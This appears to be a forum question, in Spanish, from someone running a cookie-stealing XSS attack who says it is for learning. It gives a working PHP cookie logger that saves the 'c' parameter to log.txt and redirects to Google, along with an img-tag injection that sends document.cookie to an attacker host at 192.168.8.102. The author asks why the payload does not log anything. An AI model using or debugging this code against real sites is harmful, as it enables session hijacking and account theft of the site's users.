Estoy intentando robar cookies para fines de aprendizaje y para eso he configurado un servidor de atacantes donde mi sitio web malicioso está ejecutando el robo de cookies de usuarios y funciona cuando visito como
Registra cualquier retención del parámetro c, en la cadena document.cookie del caso anterior.
El simple ladrón de cookies tiene las siguientes líneas de código
<?php
header('Location:https://google.com');
$cookies = $_GET["c"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookies . "\n\n");
?>
El problema es cuando uso el mismo enlace en el atributo img tag src, no registra nada en el archivo log.txt. Estoy usando la siguiente publicación en el sitio vulnerable;
<img src="http://192.168.8.102/cookiestealer.php?c="+document.cookieonerror="alert('Your cookie has been served')" />
Pero no registra nada en el servidor. Sin embargo, el archivo cambia a medida que el editor me pide que vuelva a cargar, pero no hay nada escrito sobre él. No hay HTTPOnly = true para ninguna cookie en este sitio.
¿Alguna sugerencia? Gracias.